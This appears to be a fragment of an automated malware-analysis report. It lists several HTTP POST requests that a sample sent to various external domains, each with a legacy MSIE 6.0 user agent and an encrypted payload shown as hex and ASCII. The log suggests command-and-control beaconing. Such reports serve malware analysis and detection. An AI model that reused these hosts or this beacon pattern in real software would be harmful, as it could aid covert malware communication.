37 75 7a 4b 43 48 75 6f 4e 48 6b 6c 4f 61 4e 45 4e 33 34 30 68 62 67 33 39 4a 46 35 6b 38 63 39 59 51 76 2b 73 4f 61 47 2b 69 55 47 31 4a 50 54 65 45 43 44 75 59 42 75 34 54 5a 65 32 48 74 4c 41 37 64 67 5a 79 4f 70 7a 64 50 52 6c 58 44 55 6c 63 76 73 69 66 33 2b 4b 54 30 33 7a 57 48 32 55 6a 34 75 36 4f 6e 2b 6d 67 32 2b 30 63 62 71 36 36 72 5a 51 65 55 30 64 4a 71 5a 31 52 6f 66 65 43 6e 6f 35 4d 35 79 72 48 75 2b 47 76 57 6c 64 68 51 47 50 79 44 58 37 71 55 42 44 72 62 7a 73 2f 6c 6a 7a 2f 68 30 4d 41 4b 46 39 33 70 48 38 67 5a 47 7a 34 41 30 52 57 39 43 49 47 2b 78 31 65 4c 63 47 6f 4b 32 44 44 6d 79 4b 7a 39 33 52 68 77 32 4a 72 66 67 64 31 38 62 6c 59 36 67 6c 56 6d 62 53 37 34 73 6e 34 69 64 44 66 4e 6c 2b 49 6b 58 31 75 67 Data Ascii: CNQzKBJztFUF+e+AxfczuRWaun5izHTeZhqFD93zcjFwInhmnkQR2/L2AdNlN7vXwzjjr4xqQPCXjmfFGpk+2wv529L3JRp8tEpVEthQARleBfmm7kM9cbRtPZGoVtv6hohKhJDGJa+R6S41EwauAmZuieeLMl7/4bKU2F50P8t+6bjjECiv2eeExainMzFjQpVjVhNEY34glgHEoAgPtk5r+1zlYTp08e0iCOjhIfuAUGPcO65NyXaPqskcnXJa1KYKZ1JnryVY+Rhqgt8539vqABY69r64NNr2+uSoRUYxltrxsNFNqDIMASeRfwUgwmBhzJznmU4TsD2QzdllZaEmErRzN7uzKCHuoNHklOaNEN340hbg39JF5k8c9YQv+sOaG+iUG1JPTeECDuYBu4TZe2HtLA7dgZyOpzdPRlXDUlcvsif3+KT03zWH2Uj4u6On+mg2+0cbq66rZQeU0dJqZ1RofeCno5M5yrHu+GvWldhQGPyDX7qUBDrbzs/ljz/h0MAKF93pH8gZGz4A0RW9CIG+x1eLcGoK2DDmyKz93Rhw2Jrfgd18blY6glVmbS74sn4idDfNl+IkX1ug
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 43 4f 6d 49 48 4f 48 42 71 31 55 68 51 6b 35 77 51 48 46 67 39 4c 6f 41 6d 43 2f 66 38 49 42 38 70 59 36 4e 75 51 4f 31 6d 41 78 7a 32 72 42 51 31 35 6f 4c 65 4a 70 59 68 34 61 66 4c 2b 7a 43 72 65 70 6f 62 4f 69 37 68 4b 71 78 55 66 54 53 4d 41 45 4e 4e 49 69 4c 47 68 67 50 72 46 4f 5a 34 71 69 66 5a 58 41 66 43 49 52 74 2f 4c 71 6e 4a 64 72 63 68 6c 35 33 31 48 52 34 61 7a 70 7a 52 6a 50 43 5a 76 73 71 71 59 33 38 43 66 39 73 4c 37 54 31 56 54 39 45 77 4a 59 43 4f 63 4c 71 32 30 43 42 57 4d 44 71 34 4c 35 34 39 63 54 33 6f 36 50 41 61 57 71 37 6a 37 38 69 6f 46 6e 53 39 5a 77 54 73 72 6c 50 65 42 61 62 54 69 39 52 43 50 4e 4d 64 58 55 57 7a 50 76 58 33 6c 41 35 39 49 6a 33 59 38 65 63 51 33 59 44 77 61 68 4e 5a 68 62 56 76 55 44 6c 6f 66 6c 39 46 51 35 56 50 32 37 4c 66 30 62 41 57 44 57 45 6f 31 38 5a 39 4c 65 54 2b 58 2f 52 71 63 57 6b 74 5a 69 71 64 76 70 33 41 39 44 53 35 31 46 69 69 64 69 6c 34 34 5a 71 62 78 4a 66 58 4b 65 6c 38 4b 67 53 4a 36 78 69 65 72 2f 74 65 55 2f 6f 57 5a 72 47 43 6e 2f 32 63 46 4e 63 30 44 72 46 62 73 69 79 2b 71 64 32 79 66 4e 43 4f 34 39 70 31 62 54 52 59 52 45 6a 4a 35 69 75 41 69 63 73 5a 75 59 45 4b 35 7a 53 6e 61 68 70 30 48 74 56 79 35 78 66 4c 56 31 74 42 30 52 6e 35 46 4a 4c 52 33 64 74 32 31 76 31 41 37 70 6a 37 38 37 42 63 6c 63 48 41 30 55 31 6e 38 71 52 4f 53 64 6f 51 49 2f 63 33 48 48 31 63 50 47 72 4f 78 51 51 2b 49 65 79 53 37 47 4e 59 47 47 2b 6a 58 42 59 68 56 42 38 75 41 42 68 59 59 79 79 59 64 38 58 33 38 63 75 6a 54 48 31 46 46 54 74 51 51 4a 61 58 58 34 38 4d 34 58 57 71 67 38 30 4c 64 4e 62 77 64 6a 47 54 4d 2f 32 37 41 57 4b 65 74 4d 3d Data Ascii: COmIHOHBq1UhQk5wQHFg9LoAmC/f8IB8pY6NuQO1mAxz2rBQ15oLeJpYh4afL+zCrepobOi7hKqxUfTSMAENNIiLGhgPrFOZ4qifZXAfCIRt/LqnJdrchl531HR4azpzRjPCZvsqqY38Cf9sL7T1VT9EwJYCOcLq20CBWMDq4L549cT3o6PAaWq7j78ioFnS9ZwTsrlPeBabTi9RCPNMdXUWzPvX3lA59Ij3Y8ecQ3YDwahNZhbVvUDlofl9FQ5VP27Lf0bAWDWEo18Z9LeT+X/RqcWktZiqdvp3A9DS51Fiidil44ZqbxJfXKel8KgSJ6xier/teU/oWZrGCn/2cFNc0DrFbsiy+qd2yfNCO49p1bTRYREjJ5iuAicsZuYEK5zSnahp0HtVy5xfLV1tB0Rn5FJLR3dt21v1A7pj787BclcHA0U1n8qROSdoQI/c3HH1cPGrOxQQ+IeyS7GNYGG+jXBYhVB8uABhYYyyYd8X38cujTH1FFTtQQJaXX48M4XWqg80LdNbwdjGTM/27AWKetM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 53 79 37 49 43 72 76 4f 75 31 56 42 78 51 39 49 55 76 53 5a 6d 36 54 55 66 6d 54 42 2f 34 4c 57 48 34 78 48 2b 38 35 33 30 43 44 44 64 6f 39 41 59 74 58 6c 59 78 75 37 67 2b 57 52 33 54 74 58 4a 73 48 71 50 66 72 44 6e 55 49 71 38 47 42 74 59 56 77 55 54 79 72 4c 6a 30 6e 49 73 52 69 56 6d 61 61 50 51 4a 48 34 31 37 78 78 31 59 35 7a 6d 6a 65 6a 61 59 50 59 61 5a 70 32 50 51 4f 52 45 36 56 4e 68 6e 7a 70 37 4a 37 48 6f 71 2f 68 62 57 38 73 70 56 4f 6b 61 41 74 62 37 56 31 59 62 4f 61 66 32 58 7a 6a 75 6d 4b 71 68 56 45 62 6f 4d 31 61 47 41 36 4d 67 30 49 41 4f 5a 36 51 6f 51 77 75 6f 55 73 65 58 48 66 73 47 2b 71 6b 39 6c 6a 41 6d 66 78 6e 69 6e 37 52 58 45 59 48 52 73 44 72 73 44 71 6e 6a 6d 70 43 69 38 36 4a 78 2b 4f 49 49 6d 5a 64 41 7a 49 47 67 56 6a 54 4d 4d 78 47 6c 61 5a 41 53 7a 65 49 35 62 53 33 6e 50 6a 68 70 33 5a 4d 77 48 35 68 53 6e 6e 48 61 76 4a 48 53 52 33 6f 78 38 59 71 56 32 6c 4c 6c 58 49 45 65 6f 37 35 66 57 6a 52 57 36 39 71 38 2b 76 67 7a 57 44 6d 62 6f 52 45 54 70 75 5a 44 6f 45 64 46 64 65 63 46 2b 5a 53 47 42 7a 65 54 77 2b 63 66 61 52 64 52 4a 51 41 63 51 49 66 67 44 50 69 4e 39 63 4d 64 6e 7a 33 62 69 2f 66 68 31 67 69 73 33 31 41 48 2b 77 4c 67 38 63 43 7a 72 30 2f 51 66 55 4c 6d 37 71 59 4d 4e 6d 59 6a 2b 46 4f 36 4a 50 62 71 35 4f 6c 72 46 63 59 72 32 49 2b 58 30 67 77 72 6f 4c 6b 7a 68 44 74 4d 4b 30 34 37 44 59 61 35 4b 63 69 39 4f 59 71 71 6d 66 72 75 4c 7a 65 6d 47 4f 51 2b 6b 51 69 69 58 4f 4b 69 58 6f 58 70 54 50 43 44 2b 66 4f 52 4e 6b 74 4a 47 67 71 6e 6e 71 30 53 39 30 34 71 34 4b 63 62 4a 54 61 2b 6a 78 49 38 4f 49 68 76 49 6f 66 2f 61 50 64 75 37 4d 67 6d 45 4a 79 52 47 4b 6d 37 69 64 4d 4c 54 52 45 79 57 4f 4e 54 68 75 75 58 72 57 34 70 72 39 31 52 41 66 58 57 51 3d 3d Data Ascii: Sy7ICrvOu1VBxQ9IUvSZm6TUfmTB/4LWH4xH+8530CDDdo9AYtXlYxu7g+WR3TtXJsHqPfrDnUIq8GBtYVwUTyrLj0nIsRiVmaaPQJH417xx1Y5zmjejaYPYaZp2PQORE6VNhnzp7J7Hoq/hbW8spVOkaAtb7V1YbOaf2XzjumKqhVEboM1aGA6Mg0IAOZ6QoQwuoUseXHfsG+qk9ljAmfxnin7RXEYHRsDrsDqnjmpCi86Jx+OIImZdAzIGgVjTMMxGlaZASzeI5bS3nPjhp3ZMwH5hSnnHavJHSR3ox8YqV2lLlXIEeo75fWjRW69q8+vgzWDmboRETpuZDoEdFdecF+ZSGBzeTw+cfaRdRJQAcQIfgDPiN9cMdnz3bi/fh1gis31AH+wLg8cCzr0/QfULm7qYMNmYj+FO6JPbq5OlrFcYr2I+X0gwroLkzhDtMK047DYa5Kci9OYqqmfruLzemGOQ+kQiiXOKiXoXpTPCD+fORNktJGgqnnq0S904q4KcbJTa+jxI8OIhvIof/aPdu7MgmEJyRGKm7idMLTREyWONThuuXrW4pr91RAfXWQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 64 30 72 54 58 2f 76 68 78 6c 55 51 35 73 37 59 6b 6d 38 56 35 2b 53 4a 75 56 77 42 4a 50 57 49 58 32 73 72 57 5a 48 42 34 48 71 4f 56 6b 43 38 61 6f 6b 47 73 79 4d 32 52 64 4b 33 2b 6c 72 44 39 6e 58 2f 56 56 42 71 36 4a 36 30 71 75 73 51 79 54 4f 68 75 67 6e 70 6c 56 67 31 64 50 56 4d 74 71 6e 45 53 76 79 50 37 32 36 66 75 66 73 73 33 44 31 6d 73 61 33 58 75 6a 36 36 65 69 79 6f 59 41 44 56 69 49 2b 77 54 52 46 43 58 30 73 48 6f 67 72 79 31 64 56 57 77 32 45 4c 30 67 61 6c 32 67 4b 54 71 38 44 57 49 4d 32 57 34 43 78 71 67 50 47 6c 66 58 77 76 63 38 68 6d 36 49 53 55 34 61 61 57 56 64 46 6d 52 50 75 4a 37 2f 79 63 35 69 6c 78 48 57 43 72 67 48 41 76 54 51 73 43 6f 37 72 69 54 4f 4f 39 30 2b 50 4c 63 56 49 31 79 32 44 6e 66 6b 79 55 70 53 46 4e 6d 5a 64 2b 50 6c 78 6b 2b 72 2b 4c 47 51 78 77 66 51 36 73 6b 79 4c 41 38 5a 79 70 69 50 62 48 4c 4b 37 2f 55 33 58 49 70 79 64 50 53 6c 61 51 54 75 6c 53 6f 59 57 38 36 67 47 74 6f 53 61 65 30 62 59 4e 78 71 6a 5a 74 30 75 69 63 32 72 6c 76 69 39 59 5a 70 63 4d 70 63 35 73 38 75 6c 6c 78 68 71 5a 67 4c 75 78 71 45 73 38 47 70 74 4d 32 46 77 47 68 6e 42 61 6a 2b 64 32 2f 6a 62 77 48 6e 32 37 48 69 34 7a 64 6f 6d 38 79 38 6b 31 42 50 33 63 47 62 71 53 6c 66 77 79 77 65 69 51 51 78 66 68 73 51 42 4c 50 74 6d 6f 7a 2b 36 47 39 71 48 6d 54 4a 54 39 68 62 39 2b 51 2b 55 74 61 45 6a 30 38 50 52 4e 58 66 41 6a 55 47 58 4d 42 69 48 46 7a 78 48 31 36 75 51 7a 51 30 4b 54 64 4b 79 51 71 78 66 6c 58 2b 30 66 64 47 42 78 7a 61 69 30 37 4e 6e 6a 4a 32 34 72 5a 79 32 69 69 37 79 54 52 52 2b 6b 41 62 2f 5a 46 6f 6c 4b 34 4e 42 66 49 37 64 64 62 6c 71 2f 5a 78 38 3d Data Ascii: d0rTX/vhxlUQ5s7Ykm8V5+SJuVwBJPWIX2srWZHB4HqOVkC8aokGsyM2RdK3+lrD9nX/VVBq6J60qusQyTOhugnplVg1dPVMtqnESvyP726fufss3D1msa3Xuj66eiyoYADViI+wTRFCX0sHogry1dVWw2EL0gal2gKTq8DWIM2W4CxqgPGlfXwvc8hm6ISU4aaWVdFmRPuJ7/yc5ilxHWCrgHAvTQsCo7riTOO90+PLcVI1y2DnfkyUpSFNmZd+Plxk+r+LGQxwfQ6skyLA8ZypiPbHLK7/U3XIpydPSlaQTulSoYW86gGtoSae0bYNxqjZt0uic2rlvi9YZpcMpc5s8ullxhqZgLuxqEs8GptM2FwGhnBaj+d2/jbwHn27Hi4zdom8y8k1BP3cGbqSlfwyweiQQxfhsQBLPtmoz+6G9qHmTJT9hb9+Q+UtaEj08PRNXfAjUGXMBiHFzxH16uQzQ0KTdKyQqxflX+0fdGBxzai07NnjJ24rZy2ii7yTRR+kAb/ZFolK4NBfI7ddblq/Zx8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 62 72 61 48 52 31 38 6d 50 34 35 35 63 56 6f 30 76 73 41 30 58 75 69 6a 6b 73 34 31 61 69 58 32 41 32 78 45 73 68 4c 57 6f 4e 52 78 72 58 66 43 67 46 47 30 47 78 76 59 43 61 37 2f 6a 78 6b 4a 45 6a 6c 52 79 4f 4e 77 63 4b 58 5a 30 4e 76 63 52 6f 52 79 43 43 48 33 75 67 41 61 30 37 61 69 4d 73 48 37 54 4d 52 63 38 34 4c 71 73 37 45 36 74 78 61 4e 45 56 6c 4d 32 35 42 41 6c 69 50 4b 6f 30 35 46 48 65 72 39 75 32 6c 6f 62 76 5a 42 74 51 4a 67 31 77 6f 55 58 51 52 33 37 30 75 63 56 69 58 43 6b 30 48 58 48 54 49 66 32 4f 6b 44 76 53 46 47 52 62 57 77 41 42 78 30 6a 73 59 38 52 4f 51 49 36 41 58 50 4a 74 49 39 39 4d 33 6d 32 62 57 52 49 56 54 61 4d 53 6b 74 79 4d 38 61 51 33 4e 54 47 55 4a 65 2b 6a 71 75 77 52 73 31 41 2b 76 33 53 79 50 41 66 4e 75 39 42 56 56 73 69 51 70 71 4a 63 4e 33 44 46 38 78 2b 38 79 78 52 4f 4c 38 52 35 49 62 46 4b 7a 65 45 38 55 51 4d 57 47 6f 5a 37 68 56 64 5a 52 51 70 35 66 78 74 38 38 42 70 51 44 65 4e 30 50 4e 5a 47 63 38 72 4c 76 65 77 31 46 58 70 6a 52 47 33 77 54 34 77 37 67 6d 48 69 56 5a 4a 59 42 31 38 45 4d 4b 64 54 45 39 63 43 4d 41 33 43 61 68 6a 31 4c 57 58 43 67 78 2f 69 72 6a 73 77 4d 71 4d 65 5a 79 51 56 56 59 6c 75 69 5a 78 2f 78 4a 6f 73 64 6f 66 33 42 6e 38 35 4b 52 52 6e 31 54 54 50 64 73 76 6d 4e 72 4d 49 39 63 46 43 68 71 54 74 59 39 71 62 43 79 45 57 67 63 54 69 68 73 66 49 61 4d 55 34 73 4a 66 34 63 5a 48 4e 66 6e 7a 50 45 69 72 4c 4a 53 31 71 38 78 77 6f 30 6a 49 33 55 75 41 6f 78 76 47 6f 43 4a 75 77 78 2b 67 4a 48 41 33 51 38 4a 77 56 71 56 79 79 4e 34 39 64 72 73 55 5a 6a 58 74 6c 46 7a 50 62 71 66 72 74 6a 49 48 7a 7a 35 67 70 79 6a 6a 32 4a 6e 58 31 67 37 6d 6c 45 3d Data Ascii: braHR18mP455cVo0vsA0Xuijks41aiX2A2xEshLWoNRxrXfCgFG0GxvYCa7/jxkJEjlRyONwcKXZ0NvcRoRyCCH3ugAa07aiMsH7TMRc84Lqs7E6txaNEVlM25BAliPKo05FHer9u2lobvZBtQJg1woUXQR370ucViXCk0HXHTIf2OkDvSFGRbWwABx0jsY8ROQI6AXPJtI99M3m2bWRIVTaMSktyM8aQ3NTGUJe+jquwRs1A+v3SyPAfNu9BVVsiQpqJcN3DF8x+8yxROL8R5IbFKzeE8UQMWGoZ7hVdZRQp5fxt88BpQDeN0PNZGc8rLvew1FXpjRG3wT4w7gmHiVZJYB18EMKdTE9cCMA3Cahj1LWXCgx/irjswMqMeZyQVVYluiZx/xJosdof3Bn85KRRn1TTPdsvmNrMI9cFChqTtY9qbCyEWgcTihsfIaMU4sJf4cZHNfnzPEirLJS1q8xwo0jI3UuAoxvGoCJuwx+gJHA3Q8JwVqVyyN49drsUZjXtlFzPbqfrtjIHzz5gpyjj2JnX1g7mlE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 64 30 72 54 58 2f 76 68 78 6c 55 51 35 73 37 59 6b 6d 38 56 35 2b 53 4a 75 56 77 42 4a 50 57 49 58 32 73 72 57 5a 48 42 34 48 71 4f 56 6b 43 38 61 6f 6b 47 73 79 4d 32 52 64 4b 33 2b 6c 72 44 39 6e 58 2f 56 56 42 71 36 4a 36 30 71 75 73 51 79 54 4f 68 75 67 6e 70 6c 56 67 31 64 50 56 4d 74 71 6e 45 53 76 79 50 37 32 36 66 75 66 73 73 33 44 31 6d 73 61 33 58 75 6a 36 36 65 69 79 6f 59 41 44 56 69 49 2b 77 54 52 46 43 58 30 73 48 6f 67 72 79 31 64 56 57 77 32 45 4c 30 67 61 6c 32 67 4b 54 71 38 44 57 49 4d 32 57 34 43 78 71 67 50 47 6c 66 58 77 76 63 38 68 6d 36 49 53 55 34 61 61 57 56 64 46 6d 52 50 75 4a 37 2f 79 63 35 69 6c 78 48 57 43 72 67 48 41 76 54 51 73 43 6f 37 72 69 54 4f 4f 39 30 2b 50 4c 63 56 49 31 79 32 44 6e 66 6b 79 55 70 53 46 4e 6d 5a 64 2b 50 6c 78 6b 2b 72 2b 4c 47 51 78 77 66 51 36 73 6b 79 4c 41 38 5a 79 70 69 50 62 48 4c 4b 37 2f 55 33 58 49 70 79 64 50 53 6c 61 51 54 75 6c 53 6f 59 57 38 36 67 47 74 6f 53 61 65 30 62 59 4e 78 71 6a 5a 74 30 75 69 63 32 72 6c 76 69 39 59 5a 70 63 4d 70 63 35 73 38 75 6c 6c 78 68 71 5a 67 4c 75 78 71 45 73 38 47 70 74 4d 32 46 77 47 68 6e 42 61 6a 2b 64 32 2f 6a 62 77 48 6e 32 37 48 69 34 7a 64 6f 6d 38 79 38 6b 31 42 50 33 63 47 62 71 53 6c 66 77 79 77 65 69 51 51 78 66 68 73 51 42 4c 50 74 6d 6f 7a 2b 36 47 39 71 48 6d 54 4a 54 39 68 62 39 2b 51 2b 55 74 61 45 6a 30 38 50 52 4e 58 66 41 6a 55 47 58 4d 42 69 48 46 7a 78 48 31 36 75 51 7a 51 30 4b 54 64 4b 79 51 71 78 66 6c 58 2b 30 66 64 47 42 78 7a 61 69 30 37 4e 6e 6a 4a 32 34 72 5a 79 32 69 69 37 79 54 52 52 2b 6b 41 62 2f 5a 46 6f 6c 4b 34 4e 42 66 49 37 64 64 62 6c 71 2f 5a 78 38 3d Data Ascii: d0rTX/vhxlUQ5s7Ykm8V5+SJuVwBJPWIX2srWZHB4HqOVkC8aokGsyM2RdK3+lrD9nX/VVBq6J60qusQyTOhugnplVg1dPVMtqnESvyP726fufss3D1msa3Xuj66eiyoYADViI+wTRFCX0sHogry1dVWw2EL0gal2gKTq8DWIM2W4CxqgPGlfXwvc8hm6ISU4aaWVdFmRPuJ7/yc5ilxHWCrgHAvTQsCo7riTOO90+PLcVI1y2DnfkyUpSFNmZd+Plxk+r+LGQxwfQ6skyLA8ZypiPbHLK7/U3XIpydPSlaQTulSoYW86gGtoSae0bYNxqjZt0uic2rlvi9YZpcMpc5s8ullxhqZgLuxqEs8GptM2FwGhnBaj+d2/jbwHn27Hi4zdom8y8k1BP3cGbqSlfwyweiQQxfhsQBLPtmoz+6G9qHmTJT9hb9+Q+UtaEj08PRNXfAjUGXMBiHFzxH16uQzQ0KTdKyQqxflX+0fdGBxzai07NnjJ24rZy2ii7yTRR+kAb/ZFolK4NBfI7ddblq/Zx8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 61 6a 2b 36 44 64 68 46 50 59 37 44 2f 48 56 52 32 34 39 33 73 63 76 6d 48 4f 4b 67 5a 63 6d 53 6a 47 37 4c 49 41 78 4f 49 42 64 32 59 50 44 6f 77 6c 6d 6e 37 47 66 6b 52 39 54 76 4e 69 45 43 74 4d 63 32 50 4a 70 58 77 36 35 52 74 6e 6f 6c 55 51 7a 39 33 58 6d 74 6d 44 44 50 4b 78 46 46 52 61 6b 56 72 57 79 66 34 37 44 65 30 56 6e 75 45 48 51 4b 74 33 72 59 52 2b 4c 42 51 66 7a 36 75 6d 30 39 30 52 78 31 43 6d 65 42 43 64 64 36 6b 52 5a 4e 77 5a 4a 58 72 6d 49 33 6b 54 75 62 6a 74 53 42 76 61 53 58 75 6c 70 59 44 53 6a 55 36 71 61 58 75 57 2b 46 69 70 67 77 6e 37 50 44 45 34 59 57 48 4d 6f 63 6c 57 32 72 49 67 32 46 33 72 74 75 37 64 5a 6d 7a 4e 41 75 42 35 66 6a 70 31 6d 66 39 4d 44 30 55 76 33 33 54 73 45 62 74 36 79 6b 73 50 2f 56 59 5a 36 66 72 30 59 36 6a 53 36 33 7a 4b 58 55 79 35 4f 6f 62 62 57 64 56 44 6e 55 2f 4a 39 34 37 64 67 54 72 6c 48 4a 74 79 65 30 6f 79 67 77 73 79 38 52 78 57 6c 64 52 4b 73 74 44 67 6d 55 53 2f 43 59 62 51 7a 76 71 4a 36 42 61 46 34 4d 53 59 42 30 57 63 5a 70 37 4c 46 55 4d 75 50 6f 34 32 79 37 6c 2f 56 59 7a 73 33 57 75 33 74 4d 49 34 67 51 30 75 51 67 65 32 73 34 37 78 6a 45 4e 37 51 78 78 4b 43 44 6f 76 55 41 57 33 70 6b 43 34 51 39 41 59 4f 49 42 45 42 39 65 51 72 59 4c 58 53 59 74 78 53 59 73 63 4a 62 57 30 31 2f 55 48 41 2f 32 56 43 59 43 31 54 43 33 59 6f 70 58 45 32 38 4c 44 50 57 32 48 34 76 62 73 35 31 6a 46 55 49 54 35 4a 65 37 58 38 41 46 61 58 74 47 68 76 44 74 57 6a 77 64 74 57 67 56 6e 5a 53 30 41 41 63 70 74 77 6d 79 52 52 2f 2b 4b 4b 35 4f 71 38 49 31 4b 79 75 53 77 59 68 59 6d 62 41 30 34 72 2f 2f 39 4d 73 30 44 38 69 6e 76 50 61 48 74 55 6c 66 4c 6b 73 68 36 58 31 44 4d 51 6a 68 68 76 4a Data Ascii: aj+6DdhFPY7D/HVR2493scvmHOKgZcmSjG7LIAxOIBd2YPDowlmn7GfkR9TvNiECtMc2PJpXw65RtnolUQz93XmtmDDPKxFFRakVrWyf47De0VnuEHQKt3rYR+LBQfz6um090Rx1CmeBCdd6kRZNwZJXrmI3kTubjtSBvaSXulpYDSjU6qaXuW+Fipgwn7PDE4YWHMoclW2rIg2F3rtu7dZmzNAuB5fjp1mf9MD0Uv33TsEbt6yksP/VYZ6fr0Y6jS63zKXUy5OobbWdVDnU/J947dgTrlHJtye0oygwsy8RxWldRKstDgmUS/CYbQzvqJ6BaF4MSYB0WcZp7LFUMuPo42y7l/VYzs3Wu3tMI4gQ0uQge2s47xjEN7QxxKCDovUAW3pkC4Q9AYOIBEB9eQrYLXSYtxSYscJbW01/UHA/2VCYC1TC3YopXE28LDPW2H4vbs51jFUIT5Je7X8AFaXtGhvDtWjwdtWgVnZS0AAcptwmyRR/+KK5Oq8I1KyuSwYhYmbA04r//9Ms0D8invPaHtUlfLksh6X1DMQjhhvJ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 4d 31 6f 6f 59 36 37 39 78 6c 57 5a 54 2b 4d 49 75 53 6d 62 70 68 45 72 36 49 6f 75 41 53 58 4e 77 71 44 56 31 4c 4f 44 6f 2b 76 67 67 2f 71 50 76 6f 75 48 31 69 46 47 30 46 6a 6e 33 62 6c 77 2b 75 5a 62 37 68 72 52 63 78 78 4c 43 5a 61 2b 61 4d 4d 63 6a 39 79 69 48 35 66 72 59 67 65 77 76 59 43 64 4f 34 6b 58 39 5a 6c 4e 38 66 53 70 2b 6d 4f 43 73 48 7a 6c 56 32 69 63 6b 32 7a 61 67 6e 73 4a 63 52 43 6f 54 5a 78 4a 76 44 51 4d 61 78 73 78 48 63 6c 33 31 2b 6e 77 63 69 64 58 47 44 45 32 68 52 63 70 6d 59 64 4e 46 41 7a 76 41 4b 74 39 6d 35 75 6a 46 78 56 45 6d 5a 51 67 4b 4e 39 74 43 37 5a 35 43 69 47 62 55 63 52 6a 30 59 6b 5a 77 57 64 51 6c 4c 6c 31 6f 4c 69 46 50 4e 50 55 4f 73 56 66 76 71 66 79 39 34 4e 45 4c 44 41 67 56 56 4b 68 53 33 66 31 41 4d 79 6b 56 4a 43 74 78 2b 53 77 74 53 30 76 45 68 33 6c 49 2b 2f 44 44 68 30 2b 4a 4a 46 50 4c 35 55 55 34 2f 46 78 48 44 38 38 6b 6d 4f 41 37 58 39 50 69 79 70 49 68 54 62 67 72 62 6f 6f 4e 48 6a 66 71 77 42 56 70 5a 66 4c 64 63 50 30 2b 48 47 48 6d 63 6f 37 6e 73 75 4f 50 33 54 4a 66 71 61 59 71 34 76 50 57 46 71 4e 71 33 2b 66 30 6f 47 4e 44 5a 61 61 35 4d 66 4d 4b 4e 4f 73 71 4a 47 36 47 54 2b 4b 2f 43 58 59 65 49 55 65 6b 6e 63 51 4c 58 30 35 41 42 7a 58 79 70 4f 62 52 37 39 51 71 37 50 34 35 44 78 4d 73 43 69 69 32 44 45 48 72 6b 32 6b 58 7a 4d 77 36 47 6d 5a 4f 30 63 30 78 58 4d 64 66 70 41 62 43 39 32 6b 78 4e 45 4c 55 72 73 76 74 65 43 5a 47 72 78 6d 71 48 45 73 37 2f 6d 45 43 78 6f 4b 77 49 55 4d 48 31 6f 6c 48 55 6a 6c 53 63 4e 39 32 5a 4d 57 56 57 75 7a 5a 73 2b 63 2b 6f 48 41 48 66 41 68 64 59 2f 36 4b 41 63 69 4f 4c 49 4a 56 74 72 71 63 5a 2f 44 65 6d 62 66 59 4e 69 33 44 76 63 30 6a 53 72 4f 30 65 64 33 70 31 56 68 36 37 52 59 62 76 49 2f 35 2b 6f 3d Data Ascii: M1ooY679xlWZT+MIuSmbphEr6IouASXNwqDV1LODo+vgg/qPvouH1iFG0Fjn3blw+uZb7hrRcxxLCZa+aMMcj9yiH5frYgewvYCdO4kX9ZlN8fSp+mOCsHzlV2ick2zagnsJcRCoTZxJvDQMaxsxHcl31+nwcidXGDE2hRcpmYdNFAzvAKt9m5ujFxVEmZQgKN9tC7Z5CiGbUcRj0YkZwWdQlLl1oLiFPNPUOsVfvqfy94NELDAgVVKhS3f1AMykVJCtx+SwtS0vEh3lI+/DDh0+JJFPL5UU4/FxHD88kmOA7X9PiypIhTbgrbooNHjfqwBVpZfLdcP0+HGHmco7nsuOP3TJfqaYq4vPWFqNq3+f0oGNDZaa5MfMKNOsqJG6GT+K/CXYeIUekncQLX05ABzXypObR79Qq7P45DxMsCii2DEHrk2kXzMw6GmZO0c0xXMdfpAbC92kxNELUrsvteCZGrxmqHEs7/mECxoKwIUMH1olHUjlScN92ZMWVWuzZs+c+oHAHfAhdY/6KAciOLIJVtrqcZ/DembfYNi3Dvc0jSrO0ed3p1Vh67RYbvI/5+o=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 36 67 61 70 43 72 66 4e 75 31 58 46 63 47 65 70 4a 6b 2f 4f 67 51 43 35 51 4d 39 74 73 46 50 51 32 31 78 33 57 7a 57 6d 67 44 65 5a 45 30 63 55 77 39 4f 47 4f 61 31 73 64 71 46 33 45 59 64 42 47 64 4c 39 4e 48 52 74 71 65 70 4f 4f 4d 72 79 70 38 44 58 50 63 45 6f 7a 6a 66 65 75 76 78 2f 77 68 4f 6b 32 34 35 71 65 66 4d 4a 63 73 49 44 6d 79 46 33 73 39 48 59 4b 54 4d 69 34 5a 45 62 37 55 72 63 55 4f 56 31 4d 68 65 7a 6f 61 47 45 66 39 75 63 63 32 52 64 57 49 4f 44 49 42 64 